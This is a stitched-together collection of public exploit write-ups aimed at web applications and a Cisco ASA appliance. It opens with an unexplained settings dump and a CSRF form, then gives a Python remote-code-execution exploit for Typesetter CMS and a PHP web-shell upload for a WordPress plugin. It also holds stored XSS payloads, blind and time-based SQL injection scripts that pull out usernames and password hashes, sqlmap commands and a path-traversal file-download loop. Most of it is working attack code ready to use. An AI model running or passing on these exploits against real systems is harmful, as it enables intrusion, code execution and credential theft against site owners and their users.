use_comments=1&img_dir=images&skin_dir=themes&file_base_path=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ffiles&
file_max_upload_size=2000000&tempdir=%2Fvar%2Fwww%2Fvhosts%2Flocalhost%2Fhttpdocs%2Ftextpattern%2Ftextpattern%2Ftmp&plugin_cache_dir=&
smtp_from=&publisher_email=&override_emailcharset=0&enable_xmlrpc_server=0&default_event=article&theme_name=hive&module_pophelp=1&default_publish_status=4&
title_no_widow=0&articles_use_excerpts=1&allow_form_override=1&attach_titles_to_permalinks=1&permlink_format=1&send_lastmod=1&publish_expired_articles=0&use_textile=1&enable_short_tags=1&
use_plugins=1&admin_side_plugins=1&allow_page_php_scripting=1&allow_article_php_scripting=1&max_url_len=1000&syndicate_body_or_excerpt=1&rss_how_many=5&show_comment_count_in_feed=1&
include_email_atom=0&use_mail_on_feeds_id=0&comments_on_default=0&comments_default_invite=Comment&comments_moderate=1&comments_disabled_after=42&comments_auto_append=0&
comments_mode=0&comments_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&comments_sendmail=0&comments_are_ol=1&comment_means_site_updated=1&
comments_require_name=1&comments_require_email=1&never_display_email=1&comment_nofollow=1&comments_disallow_images=0&comments_use_fat_textile=0&spam_blacklists=&
custom_1_set=custom1&custom_2_set=custom2&custom_3_set=&custom_4_set=&custom_5_set=&custom_6_set=&custom_7_set=&custom_8_set=&custom_9_set=&custom_10_set=&
step=prefs_save&event=prefs&_txp_token=0342db47efb6882b488f6d367067d720
### EXPLOIT ####
<html>
<!-- CSRF PoC -->
<body>
<form action="https://localhost/textpattern/textpattern/index.php" method="POST">
<input type="hidden" name="Submit" value="Save" />
<input type="hidden" name="sitename" value="CHANGEHERE" />
<input type="hidden" name="siteurl" value="CHANGEHERE" />
<input type="hidden" name="site_slogan" value="CHANGEHERE" />
<input type="hidden" name="production_status" value="testing" />
<input type="hidden" name="timezone_key" value="Europe/Berlin" />
<input type="hidden" name="auto_dst" value="0" />
<input type="hidden" name="is_dst" value="0" />
<input type="hidden" name="dateformat" value="since" />
<input type="hidden" name="archive_dateformat" value="%b %Oe, %I:%M %p" />
<input type="hidden" name="permlink_mode" value="section_id_title" />
<input type="hidden" name="doctype" value="html5" />
<input type="hidden" name="logging" value="none" />
<input type="hidden" name="expire_logs_after" value="7" />
<input type="hidden" name="use_comments" value="1" />
<input type="hidden" name="img_dir" value="images" />
<input type="hidden" name="skin_dir" value="themes" />
<input type="hidden" name="file_base_path" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/files" />
<input type="hidden" name="file_max_upload_size" value="2000000" />
<input type="hidden" name="tempdir" value="/var/www/vhosts/.demo.localhost./httpdocs/textpattern/textpattern/tmp" />
<input type="hidden" name="plugin_cache_dir" value="" />
<input type="hidden" name="smtp_from" value="" />
<input type="hidden" name="publisher_email" value="" />
<input type="hidden" name="override_emailcharset" value="0" />
<input type="hidden" name="enable_xmlrpc_server" value="0" />
<input type="hidden" name="default_event" value="article" />
<input type="hidden" name="theme_name" value="hive" />
<input type="hidden" name="module_pophelp" value="1" />
<input type="hidden" name="default_publish_status" value="4" />
<input type="hidden" name="title_no_widow" value="0" />
<input type="hidden" name="articles_use_excerpts" value="1" />
<input type="hidden" name="allow_form_override" value="1" />
<input type="hidden" name="attach_titles_to_permalinks" value="1" />
<input type="hidden" name="permlink_format" value="1" />
<input type="hidden" name="send_lastmod" value="1" />
<input type="hidden" name="publish_expired_articles" value="0" />
<input type="hidden" name="use_textile" value="1" />
<input type="hidden" name="enable_short_tags" value="1" />
<input type="hidden" name="use_plugins" value="1" />
<input type="hidden" name="admin_side_plugins" value="1" />
<input type="hidden" name="allow_page_php_scripting" value="1" />
<input type="hidden" name="allow_article_php_scripting" value="1" />
<input type="hidden" name="max_url_len" value="1000" />
<input type="hidden" name="syndicate_body_or_excerpt" value="1" />
<input type="hidden" name="rss_how_many" value="5" />
<input type="hidden" name="show_comment_count_in_feed" value="1" />
<input type="hidden" name="include_email_atom" value="0" />
<input type="hidden" name="use_mail_on_feeds_id" value="0" />
<input type="hidden" name="comments_on_default" value="0" />
<input type="hidden" name="comments_default_invite" value="Comment" />
<input type="hidden" name="comments_moderate" value="1" />
<input type="hidden" name="comments_disabled_after" value="42" />
<input type="hidden" name="comments_auto_append" value="0" />
<input type="hidden" name="comments_mode" value="0" />
<input type="hidden" name="comments_dateformat" value="%b %Oe, %I:%M %p" />
<input type="hidden" name="comments_sendmail" value="0" />
<input type="hidden" name="comments_are_ol" value="1" />
<input type="hidden" name="comment_means_site_updated" value="1" />
<input type="hidden" name="comments_require_name" value="1" />
<input type="hidden" name="comments_require_email" value="1" />
<input type="hidden" name="never_display_email" value="1" />
<input type="hidden" name="comment_nofollow" value="1" />
<input type="hidden" name="comments_disallow_images" value="0" />
<input type="hidden" name="comments_use_fat_textile" value="0" />
<input type="hidden" name="spam_blacklists" value="" />
<input type="hidden" name="custom_1_set" value="custom1" />
<input type="hidden" name="custom_2_set" value="custom2" />
<input type="hidden" name="custom_3_set" value="" />
<input type="hidden" name="custom_4_set" value="" />
<input type="hidden" name="custom_5_set" value="" />
<input type="hidden" name="custom_6_set" value="" />
<input type="hidden" name="custom_7_set" value="" />
<input type="hidden" name="custom_8_set" value="" />
<input type="hidden" name="custom_9_set" value="" />
<input type="hidden" name="custom_10_set" value="" />
<input type="hidden" name="step" value="prefs_save" />
<input type="hidden" name="event" value="prefs" />
<input type="hidden" name="_txp_token" value="0342db47efb6882b488f6d367067d720" />
<input type="submit" value="Do Action" />
</form>
</body>
</html>
# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790
######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface, the
# attacker only needs to extract the .zip that was previously loaded and
# click on the malicious .php file to execute commands in the operating
# system.
#
######## Exploit with Poc ########
https://github.com/t0gu/CVE-2020-25790
####### Code #######
# see the poc at https://github.com/t0gu/CVE-2020-25790
import argparse
from bs4 import BeautifulSoup
import requests
import sys
import re
import urllib3
from urllib3.exceptions import InsecureRequestWarning
banner = """
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗███████╗ █████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔═████╗ ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗ ██╔╝╚██████║██║██╔██║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║ ██╔╝ ╚═══██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝ ███████╗███████║ ██║ █████╔╝╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚════╝ ╚═════╝
by: t0gu
usage: main.py [-h] -p PASSWORD -l LOGIN -u URL
==> Exploit for CVE 2020-25790
optional arguments:
-h, --help show this help message and exit
-p PASSWORD, --password PASSWORD
==> admin password
-l LOGIN, --login LOGIN
==> admin login
-u URL, --url URL ==> main URL
"""
print(banner)
menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside")
args = menu.parse_args()
login = args.login
password = args.password
url = args.url
file = args.file
PROXIES = proxies = {
"http": "http://127.0.0.1:8080",
"https": "https://127.0.0.1:8080",
}
class Exploit:
def __init__(self, login, password, url, file):
self.login = login
self.password = password
self.url = url
self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
self.file = open(file, 'rb')
def get_nounce(self):
try:
url = self.url + "/Admin"
r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
data = r.text
soap_obj = BeautifulSoup(data, 'html.parser')
for inp in soap_obj.find_all("input"):
for v in inp:
nounce = v['value']
if nounce != None or nounce != "":
return nounce
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_hash_folders(self):
cookie_auth = self.get_cookies()
hash_verified = self.get_verified()
data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1}
try:
url = self.url + "/Admin_Finder"
r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False)
json_data = r.json()
hash_dir = json_data['files'][2]['hash']
return hash_dir
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_cookies(self):
nounce = self.get_nounce()
if nounce:
try:
url = self.url + "/Admin"
data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '',
'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '',
'remember': 'on', 'verified': ''}
r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False,
headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
cookie_admin = r.headers['Set-Cookie']
cookie_name = cookie_admin.split(':')[0].split('=')[0]
cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]
if cookie_name == None or cookie_name == "":
if cookie_value == None or cookie_value == "":
print("==> Something went wrong while login")
else:
data = f"{cookie_name}={cookie_value};"
return data
except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
print(f'==> Error while login {e}')
def upload_zip(self):
url = self.url + '/Admin_Finder'
hash_verified = self.get_verified()
hash_dir = self.get_hash_folders()
auth_cookie = self.get_cookies()
try:
print(f"==> Uploading file: {self.file}")
data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
r = requests.post(url=url, verify=False, timeout=10,
headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file})
hash_file = r.json()['added'][0]['hash']
self.extract_file(auth_cookie, hash_file, hash_verified)
except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
print(f"==> Error while uploading {e}")
def extract_file(self, auth_cookie, hash_file, hash_verified):
data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
try:
url = self.url + "/Admin_Finder"
r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
name_file = r.json()['added'][0]['name']
print(f"==> All Hashes are collected from: {name_file}")
self.xpl(auth_cookie,name_file)
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def xpl(self, auth_cookie, name_file):
try:
url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
new_url = url.replace("index.php", "")
print(f"==> Try to exploit: {new_url}")
r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
pattern = r'<pre>(.*?)</pre>'
m = re.search(pattern, r.text.replace("\n", ""))
if m is not None and m != "":
print(f"==> Vulnerable: {m.group(1)}")
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_verified(self):
try:
url = self.url + "/Admin/Uploaded"
auth_cookie = self.get_cookies()
r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
data = r.text
pattern_regex = r'"verified":"(.*)"}'
m = re.search(pattern_regex, data)
if m is not None or m != "":
return m.group(1)
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
if __name__ == "__main__":
obj = Exploit(login, password, url, file)
obj.upload_zip()
# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to
Courses Content Disclosure
# Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec)
# Authors blog: https://www.redtimmy.com
# Vendor Homepage: https://wpcoursesplugin.com/
# Version Vulnerable: < 2.0.29
# CVE: (requested but not assigned yet)
WP Courses plugin < 2.0.29 does not protect the courses which could be
accessed by unauthenticated users using the REST API (/wp-jon/)
endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could
result in attackers accessing paying content without authorization.
Full story here:
https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/19
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Vulnerable Pages:
http://localhost/loan/index.php?page=loans
http://localhost/loan/index.php?page=payments
http://localhost/loan/index.php?page=borrowers
http://localhost/loan/index.php?page=loan_type
Proof of Concept:
1 - Go to vulnerable pages and using edit button (in the right, action column).
2 - And fill the blanks with "<script>alert(1)</script>" payload.
# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# CVE: CVE-2020-25760
# Description
The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database.
Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how.
#POC
1) Navigate to the login page
Example:
http://192.168.1.72/visitor_management/index.php
2) Enter 'username' and 'password'
3) On the homepage, click on any visitor name and intercept the request
4) Save the request to file. Example, visitor_management_sqli.req
GET /visitor_management/front.php?rid=373568 HTTP/1.1
Host: 192.168.1.72
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.1.72/visitor_management/front.php
Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef
Upgrade-Insecure-Requests: 1
5) Run SQLmap on the file,
sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10
# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS
# Google Dork: N/A
# Date: 2020-08-07
# Exploit Author: yusufmalikul
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 2.1
# Tested on: Windows 10
# CVE : N/A
Description
User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to
Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user
list on manage user page triggering the payload.
POC
User side
1. Go to the user registration page http://localhost/loginsystem
2. Enter <img src="x" onerror=alert(document.cookie)> in one of the field (first name, last name, email, or contact)
3. Click sign up
Admin side
1. Login to admin panel http://localhost/loginsystem/admin
2. After login successful it will redirect to manage user page
3. Payload triggered
# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
# Date: 2020-10-20
# Exploit Author: Net-Hunter
# Google Dork: N/A
# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
# Vendor Homepage: https://www.heliossolutions.co/
# Tested on: Linux Apache / Wordpress 5.5.1
# Version: 2.1
.:: Description ::.
An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File
Because the extension of the Uploaded Flie is Checked on Client Side
.:: Vulnerable File ::.
/wp-admin/admin.php?page=hs-brand-logo-slider.php
.:: Vulnerable Code ::.
Content-Disposition: form-data; name="logoupload"; filename="a.php"
Content-Type: image/jpeg
<?php echo system($_GET['cmd']); ?>
.:: Proof Of Concept (Poc) ::.
Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu
Upload
Step 2 - Stop the upload request with burp suite
Step 3 - Rename the file, for example a.jpg to a.php
Step 4 - Your shell has been uploaded, showing the file path in the table
.:: Sample Request::.
POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1
Host: 172.16.1.17:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php
Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227
Content-Length: 81765
Origin: http://172.16.1.17:81
Connection: close
Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907
Upgrade-Insecure-Requests: 1
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="brandname"
aaa
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php"
Content-Type: image/jpeg
<?php echo system($_GET['cmd']); ?>
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="logourl"
http://aa.com
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="sortorder"
1
-----------------------------407602771734524910834293111227
Content-Disposition: form-data; name="submit_data"
Submit
-----------------------------407602771734524910834293111227--
# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage
# Date: 2020-16-09
# Exploit Author: nag0mez
# Vendor Homepage: https://ultimatepro.codexcube.com/
# Version: <= 2.0.5
# Tested on: Kali Linux 2020.2
# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database.
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import requests
import sys
# The original vulnerability was found on a server with an invalid SSL certificate,
# which Python could not verify. I added the verify=False parameter to avoid SSL check.
# The lack of verification results in a warning message from Python.
# To get a clean output, we will ignore all warnings.
import warnings
warnings.filterwarnings("ignore")
host = 'https://testurl.test' # Change
url = "{}/frontend/get_article_suggestion/".format(host)
chars = '1234567890abcdefghijklmnopqrstuvwxyz'
hex_chars = 'abcdef1234567890'
def send_payload(payload):
try:
response = requests.post(url, data=payload, verify=False)
content = response.text
length = len(content)
return length
except Exception as e:
print('Cannot connect to host. Exit.')
sys.exit(1)
def get_first_user():
found = True
known = ''
while found:
found = False
for c in chars:
test = known + c
payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)}
length = send_payload(payload)
if length > 2:
found = True
known += c
print(c, end='')
sys.stdout.flush()
break
return known
def get_hash(username):
found = True
known = ''
while found:
found = False
for c in hex_chars:
test = known + c
payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)}
length = send_payload(payload)
if length > 2:
found = True
known += c
print(c, end='')
sys.stdout.flush()
break
return known
if __name__ == '__main__':
print('Exploit started.')
print('Guessing username...')
username = get_first_user()
if username != '':
print('\nUsername found: {}'.format(username))
else:
print('\nCould not get username! Exit.')
sys.exit(1)
print('Guessing password SHA512 hash...')
sha = get_hash(username)
if sha != '':
print('\nHash found: {}'.format(sha))
else:
print('\nCould not get Hash! Exit.')
sys.exit(1)
# Title: Online Students Management System 1.0 - 'username' SQL Injections
# Exploit Author: George Tsimpidas
# Date: 2020-10-09
# Vendor Homepage: www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
# Version : 1.0
# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver)
# Category: Webapp
# Description
The files index.php on the main login page, and the index.php on the
/admin/ login page does not perform input validation on the regno
and username parameters. An attacker can send malicious input in the post
request to http://localhost/index.php or either
http://localhost/admin/index.php and bypass authentication, extract
sensitive information etc.
#POC
1) Navigate to the admin login page
Example:
http://localhost/admin/index.php
2) Fill in dummy values for 'username' and 'password' fields and send the
request via an HTTP intercept tool
3) Save the request to file. Example, student_record_sqli.req
POST /admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
Origin: http://localhost
DNT: 1
Connection: close
username=admin&password=dummy
4) Run SQLmap on the file,
sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username
# Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection
# Google Dork: N/A
# Date: 2020-10-11
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.berlicrm.de
# Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip
# Version: 1.0.24
# Tested on: Kali Linux
# CVE : N/A
========== Post Request =========================
POST /index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: localhost
Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 226
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
__vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup
============= Vulnerable Parameter ===============
src_record (POST)
============= Payload ===========================
0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal
# Date: 2020-10-10
# Exploit Author: 3ndG4me
# Vendor: www.cisco.com
# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html
# CVE : CVE-2020-3452
TARGET=$1
CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen"
mkdir cisco_asa_files
if [ -z "$1" ];
then
echo "Usage: cve-2020-3452.sh <target ip/hostname>"
echo "Example: cve-2020-3452.sh mytarget.com"
echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory"
echo "Target not specificed...exiting..."
else
for FILE in $CISCO_KNOWN_FILES;
do
curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE;
done
fi
#!/usr/bin/python3
# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
# Date: July 21, 2020
# Exploit Author: François Bibeau
# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
# Vendor Homepage: http://timeclock-software.net/
# Software Link: http://timeclock-software.net/timeclock-download.php
# Version: 1.01
# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache
import time
import requests
login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
login_data = {'username':'fred','password':'fred','submit':'Log In'}
headers = {'User-Agent': 'Mozilla/5.0'}
# init session & login
session = requests.Session()
session.post(login_url,headers=headers,data=login_data)
# static list provided for PoC, could use a text file
users = ['john','bill','tim','fred','garry','sid','admin']
for user in users:
url = "http://159.203.41.34/add_entry.php"
payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
data = {'data_month': '1',
'data_day': '1',
'data_year': '1',
'type_id': '5',
'hours': '1',
'notes': payload,
'submit': 'Add'}
print(f'Checking user {user}... ', end = '')
start = time.time()
response = session.post(url,data=data)
end = time.time()
delay = end - start
if delay > 5:
print('User found!')
else:
print('')